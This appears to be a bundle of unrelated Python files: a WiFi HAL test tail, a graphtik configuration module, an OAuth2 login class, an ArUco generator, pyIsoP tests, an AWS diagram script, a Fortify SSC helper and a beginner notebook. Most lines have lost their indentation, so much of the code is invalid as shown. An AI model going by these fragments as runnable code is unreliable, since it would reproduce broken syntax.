print "wifi_setApSecurityModeEnabled() call failed"
print "TEST EXECUTION RESULT : FAILURE"
#Revert the ApSecurityModeEnabled back to initial value
expectedresult="SUCCESS";
apIndex = idx;
setMethod = "setApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, initMode, setMethod)
if expectedresult in actualresult:
print "Successfully reverted the ApSecurityModeEnabled to initial value"
tdkTestObj.setResultStatus("SUCCESS");
print "TEST EXECUTION RESULT : SUCCESS"
else :
print "Unable to revert the ApSecurityModeEnabled"
tdkTestObj.setResultStatus("FAILURE");
print "TEST EXECUTION RESULT : FAILURE"
else :
tdkTestObj.setResultStatus("FAILURE");
print "Initial ApSecurityMode is not in supported modes"
print "TEST EXECUTION RESULT : FAILURE"
else :
print "wifi_getApSecurityModeEnabled() failed"
tdkTestObj.setResultStatus("FAILURE");
print "TEST EXECUTION RESULT : FAILURE"
else :
print "wifi_getApSecurityModeSupported() failed"
tdkTestObj.setResultStatus("FAILURE");
print "TEST EXECUTION RESULT : FAILURE"
obj.unloadModule("wifihal");
else:
print "Failed to load wifi module";
obj.setLoadModuleStatus("FAILURE");
|
# Copyright 2016, Yahoo Inc.
# Licensed under the terms of the Apache License, Version 2.0. See the LICENSE file associated with the project for terms.
"""
:term:`configurations` for network execution, and utilities on them.
.. seealso:: methods :func:`.plot.active_plotter_plugged()`, :func:`.plot.set_active_plotter()`,
:func:`.plot.get_active_plotter()`
Plot configurations are not defined here, to avoid polluting the import space
until they are actually needed.
.. note::
    The context-manager functions ``XXX_plugged()`` or ``XXX_enabled()`` do NOT launch
    their code blocks using :meth:`contextvars.Context.run()` in a separate "context",
    so any changes to these or other context-vars will persist
    (unless they are also done within such context-managers).
"""
import ctypes
import os
from contextlib import contextmanager
from contextvars import ContextVar
from functools import partial
from multiprocessing import Value
from typing import Optional
_debug_env_var = os.environ.get("GRAPHTIK_DEBUG")
_debug: ContextVar[Optional[bool]] = ContextVar(
"debug",
default=_debug_env_var and (_debug_env_var.lower() not in "0 false off no".split()),
)
_abort: ContextVar[Optional[bool]] = ContextVar(
"abort", default=Value(ctypes.c_bool, lock=False)
)
_skip_evictions: ContextVar[Optional[bool]] = ContextVar("skip_evictions", default=None)
_layered_solution: ContextVar[Optional[bool]] = ContextVar(
"layered_solution", default=None
)
_execution_pool: ContextVar[Optional["Pool"]] = ContextVar(
"execution_pool", default=None
)
_parallel_tasks: ContextVar[Optional[bool]] = ContextVar("parallel_tasks", default=None)
_marshal_tasks: ContextVar[Optional[bool]] = ContextVar("marshal_tasks", default=None)
_endure_operations: ContextVar[Optional[bool]] = ContextVar(
"endure_operations", default=None
)
_reschedule_operations: ContextVar[Optional[bool]] = ContextVar(
"reschedule_operations", default=None
)
def _getter(context_var) -> Optional[bool]:
return context_var.get()
def _tristate_set(context_var, enabled):
    return context_var.set(enabled if enabled is None else bool(enabled))
@contextmanager
def _tristate_armed(context_var: ContextVar, enabled=True):
"""Assumes "enabled" if `enabled` flag is None."""
resetter = context_var.set(enabled if enabled is None else bool(enabled))
try:
yield
finally:
context_var.reset(resetter)
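# A minimal usage sketch (illustrative only, not part of the module API): the
# ``XXX_enabled()``/``XXX_plugged()`` partials built from ``_tristate_armed``
# are plain context-managers that set a ContextVar on entry and reset it on exit:
#
#     with debug_enabled():    # is_debug() returns True inside the block
#         ...                  # run pipelines with debug behavior enabled
#     # the previous value of the flag is restored here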
debug_enabled = partial(_tristate_armed, _debug)
"""
Like :func:`set_debug()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_debug = partial(_getter, _debug)
"""
Return :func:`.set_debug` or `True` if :envvar:`GRAPHTIK_DEBUG` not one of ``0 false off no``.
Affected behavior when :ref:`debug` enabled:
.. debug-behavior-start
+ on errors, plots the 1st errored solution/plan/pipeline/net (in that order)
in an SVG file inside the temp-directory, and its path is logged in ERROR-level;
+ :term:`jetsam` logs in ERROR (instead of in DEBUG) all annotations on all calls
up the stack trace (logged from ``graphtik.jetsam.err`` logger);
+ :meth:`FnOp.compute()` prints out full given-inputs (not just their keys);
+ net objects print more details recursively, like fields (not just op-names) and
prune-comments;
+ plotted SVG diagrams include style-provenance as tooltips;
+ Sphinx extension also saves the original DOT file next to each image
(see :confval:`graphtik_save_dot_files`).
.. debug-behavior-end
.. Note::
The default is controlled with :envvar:`GRAPHTIK_DEBUG` environment variable.
Note that enabling this flag is different from enabling logging in DEBUG,
since it affects all code (eg interactive printing in debugger session,
exceptions, doctests), not just debug statements (also affected by this flag).
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
set_debug = partial(_tristate_set, _debug)
"""
Enable/disable debug-mode.
:param enabled:
- ``None, False, string(0, false, off, no)``: Disabled
- anything else: Enable DEBUG
see :func:`is_debug()`
"""
def abort_run():
"""
Sets the :term:`abort run` global flag, to halt all currently or future executing plans.
This global flag is reset when any :meth:`.Pipeline.compute()` is executed,
or manually, by calling :func:`.reset_abort()`.
"""
_abort.get().value = True
def reset_abort():
"""Reset the :term:`abort run` global flag, to permit plan executions to proceed. """
_abort.get().value = False
def is_abort():
"""Return `True` if networks have been signaled to stop :term:`execution`."""
return _abort.get().value
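# Illustrative: the abort flag is a shared multiprocessing boolean, so worker
# processes can poll it as well:
#
#     abort_run()          # signal all executing plans to halt
#     assert is_abort()
#     reset_abort()        # re-arm execution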
evictions_skipped = partial(_tristate_armed, _skip_evictions)
"""
Like :func:`set_skip_evictions()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_skip_evictions = partial(_getter, _skip_evictions)
"""see :func:`set_skip_evictions()`"""
set_skip_evictions = partial(_tristate_set, _skip_evictions)
"""
When true, disable globally :term:`eviction`\\s, to keep all intermediate solution values, ...
regardless of asked outputs.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
solution_layered = partial(_tristate_armed, _layered_solution)
"""
Like :func:`set_layered_solution()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_layered_solution = partial(_getter, _layered_solution)
"""see :func:`set_layered_solution()`"""
set_layered_solution = partial(_tristate_set, _layered_solution)
"""
whether to store operation results into separate :term:`solution layer`
:param enable:
If false/true, it overrides any param given when executing a pipeline or a plan.
If None (default), results are layered only if there are NO :term:`jsonp` dependencies
in the network.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
@contextmanager
def execution_pool_plugged(pool: "Optional[Pool]"):
"""
Like :func:`set_execution_pool()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
resetter = _execution_pool.set(pool)
try:
yield
finally:
_execution_pool.reset(resetter)
def set_execution_pool(pool: "Optional[Pool]"):
"""
(deprecated) Set the process-pool for :term:`parallel` plan executions.
    You may also have to use :func:`set_marshal_tasks()` to resolve
pickling issues.
"""
return _execution_pool.set(pool)
def get_execution_pool() -> "Optional[Pool]":
"""(deprecated) Get the process-pool for :term:`parallel` plan executions."""
return _execution_pool.get()
tasks_in_parallel = partial(_tristate_armed, _parallel_tasks)
"""
(deprecated) Like :func:`set_parallel_tasks()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_parallel_tasks = partial(_getter, _parallel_tasks)
"""see :func:`set_parallel_tasks()`"""
set_parallel_tasks = partial(_tristate_set, _parallel_tasks)
"""
Enable/disable globally :term:`parallel` execution of operations.
:param enable:
- If ``None`` (default), respect the respective flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
tasks_marshalled = partial(_tristate_armed, _marshal_tasks)
"""
(deprecated) Like :func:`set_marshal_tasks()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_marshal_tasks = partial(_getter, _marshal_tasks)
"""(deprecated) see :func:`set_marshal_tasks()`"""
set_marshal_tasks = partial(_tristate_set, _marshal_tasks)
"""
(deprecated) Enable/disable globally :term:`marshalling` of :term:`parallel` operations, ...
inputs & outputs with :mod:`dill`, which might help for pickling problems.
:param enable:
- If ``None`` (default), respect the respective flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
operations_endured = partial(_tristate_armed, _endure_operations)
"""
Like :func:`set_endure_operations()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_endure_operations = partial(_getter, _endure_operations)
"""see :func:`set_endure_operations()`"""
set_endure_operations = partial(_tristate_set, _endure_operations)
"""
Enable/disable globally :term:`endurance` to keep executing even if some operations fail.
:param enable:
- If ``None`` (default), respect the flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
."""
operations_reschedullled = partial(_tristate_armed, _reschedule_operations)
"""
Like :func:`set_reschedule_operations()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_reschedule_operations = partial(_getter, _reschedule_operations)
"""see :func:`set_reschedule_operations()`"""
set_reschedule_operations = partial(_tristate_set, _reschedule_operations)
"""
Enable/disable globally :term:`rescheduling` for operations returning only *partial outputs*.
:param enable:
- If ``None`` (default), respect the flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
."""
|
import json
from oic.utils.authn.client import CLIENT_AUTHN_METHOD
from idpproxy.social import Social
from oic.oauth2 import rndstr
from oic.oauth2 import Client
from oic.oauth2.message import ErrorResponse
from oic.oauth2.message import AccessTokenResponse
from oic.oauth2.message import AuthorizationResponse
from oic.oauth2.message import AuthorizationRequest
from oic.utils.http_util import Redirect
import logging
logger = logging.getLogger(__name__)
class OAuth2(Social):
def __init__(self, client_id, client_secret, **kwargs):
Social.__init__(self, client_id, client_secret, **kwargs)
self.access_token_response = AccessTokenResponse
try:
self._scope = ",".join(self.extra["scope"])
except KeyError:
self._scope = ""
self.token_response_body_type = "urlencoded"
#noinspection PyUnusedLocal
def begin(self, environ, server_env, start_response, cookie,
sid, info):
state = rndstr()
server_env["CACHE"].alternate_sid(sid, state)
callback = server_env["base_url"] + self.social_endpoint
        # redirect the user to the OAuth2 provider for authentication
ar = AuthorizationRequest().from_dict({"client_id": self.client_id,
"redirect_uri": callback,
"state": state,
"response_type": ["code"],
"scope": self._scope})
url = ar.request(self.extra["authorization_endpoint"])
logger.info("[OAuth2] callback url: %s" % url)
if cookie:
resp = Redirect(url, headers=[cookie])
else:
resp = Redirect(url)
return resp(environ, start_response)
#noinspection PyUnusedLocal
def userinfo_endpoint(self, tokenresp):
return self.extra["userinfo_endpoint"]
#noinspection PyUnusedLocal
def phaseN(self, environ, info, server_env, sid):
session = server_env["CACHE"][sid]
callback = server_env["base_url"] + self.social_endpoint
client = Client(client_id=self.client_id,
client_authn_method=CLIENT_AUTHN_METHOD)
response = client.parse_response(AuthorizationResponse, info, "dict")
logger.info("Response: %s" % response)
if isinstance(response, ErrorResponse):
logger.info("%s" % response)
session["authentication"] = "FAILED"
return False, "Authentication failed or permission not granted"
req_args = {
"redirect_uri": callback,
"client_secret": self.client_secret,
}
client.token_endpoint = self.extra["token_endpoint"]
tokenresp = client.do_access_token_request(
scope=self._scope,
body_type=self.token_response_body_type,
request_args=req_args,
authn_method="client_secret_post",
state=response["state"],
response_cls=self.access_token_response)
if isinstance(tokenresp, ErrorResponse):
logger.info("%s" % tokenresp)
session["authentication"] = "FAILED"
return False, "Authentication failed or permission not granted"
# Download the user profile and cache a local instance of the
# basic profile info
result = client.fetch_protected_resource(
self.userinfo_endpoint(tokenresp), token=tokenresp["access_token"])
logger.info("Userinfo: %s" % result.text)
profile = json.loads(result.text)
logger.info("PROFILE: %s" % (profile, ))
session["service"] = self.name
session["authentication"] = "OK"
session["status"] = "SUCCESS"
session["authn_auth"] = self.authenticating_authority
session["permanent_id"] = profile["id"]
server_env["CACHE"][sid] = session
return True, self.convert(profile), session
|
#! /usr/bin/env python
###############################################################################
# aruco_generator.py
#
# script testing basic generation of Aruco markers
#
# Code modified from that at:
# http://www.philipzucker.com/aruco-in-opencv/
#
# NOTE: Any plotting is set up for output, not viewing on screen.
# So, it will likely be ugly on screen. The saved image files should look
# better.
#
# Created: 10/21/19
# - Joshua Vaughan
# - [email protected]
# - http://www.ucs.louisiana.edu/~jev9637
#
# Modified:
# *
#
# TODO:
# *
###############################################################################
import numpy as np
import matplotlib.pyplot as plt
import cv2
import cv2.aruco as aruco
MARKER_IDS = [0, 1, 2, 3] # IDs for generated markers
MARKER_SIZE = 144 # Pixel size of (square) marker
aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
for id in MARKER_IDS:
img = aruco.drawMarker(aruco_dict, id, MARKER_SIZE)
    # Write the generated image to a file; cv2.imwrite infers the format from
    # the extension and supports raster formats like PNG (not SVG)
    cv2.imwrite(f"test_marker_{id}.png", img)
    # Then, show it
cv2.imshow('frame', img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
"""
Unit and regression test for the pyIsoP package.
"""
# Uses the pytest fixture decorator to compute the energy grid once and reuse
# it for a series of tests: values, writing, isotherms, etc.
# Import package, test suite, and other packages as needed
import pyIsoP
import pytest
import sys
#%%
def test_pyIsoP_imported():
"""Sample test, will always pass so long as import statement worked"""
assert "pyIsoP" in sys.modules
#%%
@pytest.fixture
def compute_grid():
import os
from pyIsoP import grid3D, forcefields, writer
path_to_file = os.path.dirname(pyIsoP.__file__)+'/data/ZIF-4_mod.cif'
t1=grid3D.grid3D(path_to_file,spacing=0.5 )
f1=forcefields.forcefields(t1,sigma=3.95, epsilon=46,forcefield=os.path.dirname(pyIsoP.__file__)+'/../forcefield/UFF')
t2= grid3D.grid3D.grid_calc(t1,"lj",f1)
return t2
#%%
@pytest.fixture
def compute_grid_dask():
import os
from pyIsoP import grid3D, forcefields, writer
path_to_file = os.path.dirname(pyIsoP.__file__)+'/data/ZIF-4_mod.cif'
t1=grid3D.grid3D(path_to_file,spacing=0.5 )
f1=forcefields.forcefields(t1,sigma=3.95, epsilon=46,forcefield=os.path.dirname(pyIsoP.__file__)+'/../forcefield/UFF')
grid_dask= grid3D.grid3D.grid_calc_dask(t1,f1)
t1.pot=grid_dask.compute()
return t1
#%%
@pytest.fixture
def compute_ml():
import os
import pyIsoP
from pyIsoP import machlearn
print("Testing the machine learning using GPR")
path_to_file = os.path.dirname(pyIsoP.__file__)+'/data/for_gpr_large.dat'
ml=machlearn.machlearn(restarts=1)
ml=machlearn.machlearn.GPR4n1(ml,path_to_file,0.1)
return ml
#%%
@pytest.fixture
def compute_histo(compute_grid):
from pyIsoP import histo
h=histo.histo()
h=histo.histo.grid2histo(compute_grid,h)
return h
#%%
def test_grid_values(compute_grid):
import numpy as np
print("Testing the energy grid calculation")
    print(np.min(compute_grid.pot), "Energy minimum looks good!")
    assert np.abs(np.min(np.round(compute_grid.pot, decimals=2)) + 1819.74) <= 1E-4, "Grid minimum does not match reference"
# assert(np.max(compute_grid.pot_repeat)==)
#%%
def test_grid_values_dask(compute_grid_dask):
test_grid_values(compute_grid_dask)
#%%
def test_write_grid(compute_grid):
import pyIsoP
import os
from pyIsoP import writer
import numpy as np
print("Testing the grid writer")
path_to_out_vtk = os.path.dirname(pyIsoP.__file__)+'/data/zif-4_grid'
path_to_out_pdb = os.path.dirname(pyIsoP.__file__)+'/data/zif-4_replicated.pdb'
print("Writing .vts and .pdb tests into the data folder")
writer.writer.write_vts(compute_grid,path_to_out_vtk, 1,1,1)
writer.writer.write_frame(compute_grid,path_to_out_pdb)
#should we assert something..?
#%%
def test_write_grid_dask(compute_grid_dask):
test_write_grid(compute_grid_dask)
#%%
def test_histo_vals(compute_histo):
import numpy as np
print("Testing histogram values")
# some check on the zif-4 energy histogram, within 1 kBT of expected
reference_hist = np.array([-23.89147811, -23.40855962, -22.92564113, -22.44272265,
-21.95980416, -21.47688567, -20.99396718, -20.5110487 ,
-20.02813021, -19.54521172, -19.06229324, -18.57937475,
-18.09645626, -17.61353777, -17.13061929, -16.6477008 ,
-16.16478231, -15.68186382, -15.19894534, -14.71602685,
-14.23310836, -13.75018988, -13.26727139, -12.7843529 ,
-12.30143441, -11.81851593, -11.33559744, -10.85267895,
-10.36976046, -9.88684198, -9.40392349, -8.921005 ,
-8.43808651, -7.95516803, -7.47224954, -6.98933105,
-6.50641257, -6.02349408, -5.54057559, -5.0576571 ,
-4.57473862, -4.09182013, -3.60890164, -3.12598315,
-2.64306467, -2.16014618, -1.67722769, -1.19430921,
-0.71139072, -0.22847223])
print(str(np.sum(np.abs(compute_histo.E-reference_hist))))
    assert np.sum(np.abs(compute_histo.E-reference_hist)) <= 0.1, "Histogram does not match the reference!"
#%%
def test_machlearn(compute_ml):
print("Testing the trained ML model")
import numpy as np
print(str(compute_ml.gp.predict([[6,0.5,10,5]])))
assert np.abs(compute_ml.gp.predict([[6,0.5,10,5]])-3) <=1, "Coordination number predicted doesn't agree with reference!" # See if the predicted n1 is within a certain expected range
#%%
def test_machlearn2():
print("Testing the trained ML model")
import numpy as np
import joblib
import pyIsoP
import os
path_to_joblib_dump=os.path.dirname(pyIsoP.__file__)+'/data/gprmodel_pyIsoP.joblib'
gpr = joblib.load(path_to_joblib_dump)
# print(str(gpr.predict([[6,0.5,10,5]])))
assert np.abs(gpr.predict([[6,0.5,10,5]])-3) <=1, "Coordination number predicted doesn't agree with reference!" # See if the predicted n1 is within a certain expected range
#%%
def test_predictor(compute_histo, compute_ml):
from pyIsoP import predictor
import numpy as np
print("Testing the isotherm prediction routine")
n_pressures=20
P=np.linspace(1E-5,100,n_pressures)
T=298
Vf=0.66
lcd=5.1
pld=2.4
X_test = np.array([[Vf, lcd, pld],]*n_pressures)
X_test = np.hstack((np.reshape(np.log10(P*1E5),(n_pressures,1)), X_test))
n1=compute_ml.gp.predict(X_test)
refvals=np.array([[ 23.78752723],
[ 43.53239219],
[ 44.43192367],
[ 44.89588641],
[ 45.1897038 ],
[ 45.39587854],
[ 45.5499096 ],
[ 45.66999489],
[ 45.76656782],
[ 45.84609705],
[ 45.91283278],
[ 45.96969572],
[ 46.01876613],
[ 46.06156964],
[ 46.09925272],
[ 46.1326949 ],
[ 46.16258297],
[ 46.18946154],
[ 46.21376834],
[ 46.23585941]])
# h=compute_histo
g_L_CH2=predictor.predictors.predict_isotherm(T,P,Vf,compute_histo,n1,epsilon=46,MA=14)
print(g_L_CH2)
print(refvals)
print(str(np.sum(np.abs(g_L_CH2-refvals))))
assert(np.sum(np.abs(g_L_CH2-refvals))<=5), "The predicted isotherm does not match the reference!"
#%%
|
from diagrams import Cluster, Diagram, Edge, Node
from diagrams.aws.migration import ADS
from diagrams.aws.network import ALB
from diagrams.aws.network import VPCElasticNetworkInterface
from diagrams.aws.compute import Fargate
from diagrams.aws.database import Aurora
from diagrams.aws.storage import EFS
from diagrams.aws.storage import S3
from diagrams.aws.integration import MQ
from diagrams.aws.compute import ElasticContainerServiceContainer
from diagrams.aws.network import NATGateway
from diagrams.custom import Custom
from diagrams.aws.compute import ApplicationAutoScaling
from diagrams.aws.network import CloudFront
from diagrams.aws.storage import SimpleStorageServiceS3Bucket
from diagrams.aws.network import InternetGateway
from diagrams.aws.management import CloudformationStack
from urllib.request import urlretrieve
diagramGraphAttr = {
# "splines": "ortho",
# "concentrate":"true",
}
vpcGraphAttr = {
"bgcolor":"transparent",
"pencolor":"black",
"penwidth":"2.0",
"fontsize": "24",
"fontname":"Times-Roman bold",
}
subnetGraphAttr = {
"bgcolor":"transparent",
"pencolor":"orange",
"penwidth":"3.0",
"style":"rounded,dashed,bold",
"fontsize": "22",
"fontname":"Times-Roman bold",
}
serviceBoundaryGraphAttr = {
"bgcolor":"transparent",
"style":"rounded,dashed,bold",
"penwidth":"2.0",
"fontsize": "18",
"fontname":"Times-Roman bold",
}
autoScaleGraphAttr = {
"bgcolor":"cornsilk",
"style":"rounded,bold",
"pencolor":"transparent",
"fontcolor":"transparent",
}
def egressEdge():
return Edge(color="black", style="bold")
def ingressEdge(hostName=None):
if hostName:
return Edge(color="black", style="bold", xlabel=f"Host={hostName}")
return Edge(color="black", style="bold")
def blank():
return Node("", shape="plaintext", height="0.0", width="0.0")
# Edges that connect to other services within the private subnet
def interServiceEdge(label=None):
if label:
return Edge(style="solid", xlabel=label)
return Edge(style="solid")
# Edges that connect a task to an ENI
def eniEdge():
return Edge(color="red", style="bold")
def wowzaNode():
wowzaIcon = "icons/wowzaIcon.png"
urlretrieve("https://www.wowza.com/uploads/images/Wowza-Professional-Services-Icon-250x250.png", wowzaIcon)
return Custom("Wowza\n(external)", wowzaIcon)
class DotDict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
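# Usage sketch: DotDict({"Rails": node}).Rails returns the node; this is how
# FargateTask exposes its containers below (e.g. appTask.containers.Rails).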
class FargateTask:
def __init__(self, taskName:str, containers:dict, ingressName:str = None):
"""Constructs a cluster with all of the common components of a Fargate task, such as an ENI and a list of containers.\n
Exposes the containers by name when done for adding additional connections."""
clusterName = f"{taskName} Fargate Task"
fargateGraphAttr = {
"bgcolor":"transparent",
"style":"rounded,bold",
"fontcolor":"black",
}
with Cluster (clusterName, graph_attr=fargateGraphAttr):
            # Make the ENI; the task's containers connect to it below
self.eni = VPCElasticNetworkInterface("Private IP")
eniConnection = self.eni
# If there are multiple containers, add an empty control point for the connecting
# lines just to make it a bit cleaner. Otherwise, we'll connect the container directly
# to the eni
if len(containers.keys()) > 1:
eniConnection = blank()
self.eni - eniEdge() - eniConnection
# Make egress line from eni to left edge
blank() << egressEdge() << self.eni
# Make ingress line from left edge to eni
if ingressName:
blank() >> ingressEdge(ingressName) >> self.eni
# Make containers
self.containers = DotDict({})
for containerName, containerPort in containers.items():
container = ElasticContainerServiceContainer(f"{containerName}:{containerPort}")
self.containers[containerName] = container
eniConnection - eniEdge() - container
with Diagram("Digital Exhibits and Collections", show=False, graph_attr=diagramGraphAttr, direction="LR", outformat="png"):
wowza = wowzaNode()
mediaBucket = S3("MediaBucket\n(foundation)")
wowza - mediaBucket
logBucket = SimpleStorageServiceS3Bucket("Logs\n(foundation)")
with Cluster("Unpeered VPC", graph_attr=vpcGraphAttr):
igw = InternetGateway("Internet Gateway")
with Cluster("Public Subnet", graph_attr=subnetGraphAttr):
lb = ALB("ALB:443\n(foundation)")
igw >> egressEdge() >> lb
nat = NATGateway("NAT\n(external)")
igw << egressEdge() << nat
with Cluster("Private Subnet", graph_attr=subnetGraphAttr):
blankIngress = blank()
lb >> Edge(color="black", style="bold", label="Route on host header") >> blankIngress
blankEgress = blank()
nat << egressEdge() << blankEgress
db = Aurora("Postgres\n(external)")
ns = ADS("Private Namespace\n(foundation)")
with Cluster("Honeycomb", graph_attr=serviceBoundaryGraphAttr):
honeycombEfs = EFS("FileSystem")
rabbit = MQ("Rabbit MQ")
blankRabbit = blank()
blankRabbit - interServiceEdge() - rabbit
blankNs = blank()
ns - interServiceEdge() - blankNs
solrTask = FargateTask(taskName="SolrService", containers={"Solr":8983})
solrTask.containers.Solr - interServiceEdge("/solr") - honeycombEfs
blankNs - interServiceEdge() - solrTask.eni
with Cluster("AppService Autoscale", graph_attr=autoScaleGraphAttr):
asg = ApplicationAutoScaling("Auto Scale 1-3 Tasks\non ALB OPS per target")
appTask = FargateTask(taskName="AppService", ingressName="honeycomb", containers={"Nginx":80, "Rails":3000})
appTask.containers.Rails - interServiceEdge("/rails") - honeycombEfs
appTask.containers.Rails - interServiceEdge() - blankRabbit
appTask.containers.Rails - interServiceEdge() - db
appTask.containers.Rails - interServiceEdge() - mediaBucket
appTask.containers.Nginx - appTask.containers.Rails
blankNs - interServiceEdge() - appTask.eni
with Cluster("SneakersService Autoscale", graph_attr=autoScaleGraphAttr):
asg = ApplicationAutoScaling("Auto Scale 0-3 Tasks\non jobs in honeypot_images queue")
sneakersTask = FargateTask(taskName="SneakersService", containers={"Rails":3000})
sneakersTask.containers.Rails - interServiceEdge("/rails") - honeycombEfs
sneakersTask.containers.Rails - interServiceEdge() - blankRabbit
                    # connect the autoscaler to the task's ENI (FargateTask itself is not a diagrams Node)
                    asg - sneakersTask.eni
with Cluster("Honeypot", graph_attr=serviceBoundaryGraphAttr):
honeypotEfs = EFS("FileSystem")
honeypotTask = FargateTask("AppService", {"Nginx":80, "Rails":3019}, "honeypot")
honeypotTask.containers.Rails - interServiceEdge() - honeypotEfs
honeypotTask.containers.Nginx - honeypotTask.containers.Rails
with Cluster("Buzz", graph_attr=serviceBoundaryGraphAttr):
buzzTask = FargateTask("AppService", {"Rails":80}, "buzz")
buzzTask.containers.Rails - interServiceEdge() - db
with Cluster("Beehive", graph_attr=serviceBoundaryGraphAttr):
distribution = CloudFront("Distribution")
bucket = SimpleStorageServiceS3Bucket("Static Assets")
distribution - bucket - logBucket |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import socket
from fortifyapi.fortify import FortifyApi
from webbreaker.common.api_response_helper import APIHelper
from webbreaker.fortify.config import FortifyConfig
from webbreaker.common.webbreakerhelper import WebBreakerHelper
class FortifyHelper(object):
def __init__(self, fortify_url, fortify_username, fortify_password):
# Static
self.extension = 'fpr'
# Required Globals
self.fortify_url = fortify_url
self.username = fortify_username
self.password = fortify_password
self.config = FortifyConfig()
self.runenv = WebBreakerHelper.check_run_env()
self.api = self._setup_fortify_ssc_api()
def create_application_version(self, application_name, version_name, application_template, description,
application_id=None):
"""
Creates a new Version under the specified Application ID.
:param application_name: Name of the Application to put the Version under.
:param application_id: ID of the Application. If None, creates a new Application with the application_name.
:param version_name: Name of the Version to create.
:param application_template: Brought in from the config.ini during the FortifyUpload Class __init__
:param description: Description for Application Version
:return: Version ID of the newly created Version.
"""
response = self.api.create_application_version(application_name=application_name,
application_id=application_id,
application_template=application_template,
version_name=version_name,
description=description)
APIHelper().check_for_response_errors(response)
return response.data['data']['id']
def download_version(self, version_id):
"""
Downloads the Version specified, checks for errors, then returns the data & file name (Version name)
:param version_id: Version ID to download
:return: Response data that will be written to the file & the file_name of where to download it.
"""
response, file_name = self.api.download_artifact_scan(version_id)
APIHelper().check_for_response_errors(response)
return response.data, file_name
def finalize_application_version_creation(self, version_id, custom_value):
custom_attribute = self._get_custom_attribute(custom_value)
response = \
self.api.bulk_create_new_application_version_request(version_id=version_id,
development_phase=self.config.development_phase,
development_strategy=self.config.development_strategy,
accessibility=self.config.accessibility,
business_risk_ranking=self.config.business_risk_ranking,
custom_attribute=custom_attribute
)
APIHelper().check_for_response_errors(response)
def _get_custom_attribute(self, custom_value=None):
custom_attribute_id = self._get_attribute_definition_id(search_expression=self.config.custom_attribute_name)
if custom_value:
return custom_attribute_id, custom_value
else:
return custom_attribute_id, self.config.custom_attribute_value
def get_application_id(self, application_name):
"""
Returns the ID of the specified Application. Project is a deprecated name for Application.
:return: ID of the Application
"""
response = self.api.get_projects()
APIHelper().check_for_response_errors(response)
for application in response.data['data']:
if application['name'] == application_name:
return application['id']
return None
def get_applications_and_versions(self):
"""
Gets every application & Version for listing. It returns the response data after checking for errors.
:return: Response data that will be used to list Applications & Versions
"""
response = self.api.get_all_project_versions()
APIHelper().check_for_response_errors(response)
return response.data['data']
def _get_attribute_definition_id(self, search_expression):
response = self.api.get_attribute_definition(search_expression=search_expression)
        if response.success:
            # data is a list of matching definitions; use the first if any
            if response.data['data']:
                return response.data['data'][0]['id']
        return ''
def get_version_id(self, application_name, version_name):
"""
        Returns the ID of the specified Version under the given Application. Project is a deprecated name for Application.
:return: ID of the Version
"""
response = self.api.get_all_project_versions()
APIHelper().check_for_response_errors(response)
for version in response.data['data']:
if version['project']['name'] == application_name:
if version['name'] == version_name:
return version['id']
return None
def project_version_description(self):
if self.runenv == "jenkins":
return "WebInspect scan from WebBreaker " + os.getenv('JOB_URL', "jenkins server")
else:
return "WebBreaker scan from WebBreaker host " + socket.getfqdn()
def _setup_fortify_ssc_api(self):
"""
Sets up the FortifyAPI client. Uses the username & password set in init to retrieve a token. Then use that token
to initialize the API client.
:return: API client class that can interact with Fortify SSC API.
"""
api = FortifyApi(host=self.fortify_url,
username=self.username,
password=self.password,
verify_ssl=self.config.verify_ssl)
response_token = api.get_token()
APIHelper().check_for_response_errors(response_token)
return FortifyApi(self.fortify_url, token=response_token.data['data']['token'],
verify_ssl=self.config.verify_ssl)
def upload_application_version_file(self, version_id, file_name):
response = self.api.upload_artifact_scan(file_path=('{0}.{1}'.format(file_name, self.extension)),
project_version_id=version_id)
APIHelper().check_for_response_errors(response)
@staticmethod
def trim_ext(file):
try:
return os.path.splitext(os.path.basename(file))[0]
except (TypeError, AttributeError):
return file
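# e.g. FortifyHelper.trim_ext("scans/app.fpr") returns "app"; a non-string
# argument is returned unchanged via the except branch.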
|
#!/usr/bin/env python
# coding: utf-8
# # [Code Hello World](https://academy.dqlab.id/main/livecode/45/110/524)
# In[1]:
print(10*2+5)
print("Academy DQLab")
# # [Commenting in Python](https://academy.dqlab.id/main/livecode/45/110/525)
# In[2]:
print(10*2+5) # math operation
print("Academy DQLab") # prints a sentence
# # [Printing Data Type](https://academy.dqlab.id/main/livecode/45/110/527)
# In[3]:
var_string="Belajar Python DQLAB"
var_int=10
var_float=3.14
var_list=[1,2,3,4]
var_tuple=("satu","dua","tiga")
var_dict={"nama":"Ali", 'umur':20}
print(var_string)
print(var_int)
print(var_float)
print(var_list)
print(var_tuple)
print(var_dict)
print(type(var_string))
print(type(var_int))
print(type(var_float))
print(type(var_list))
print(type(var_tuple))
print(type(var_dict))
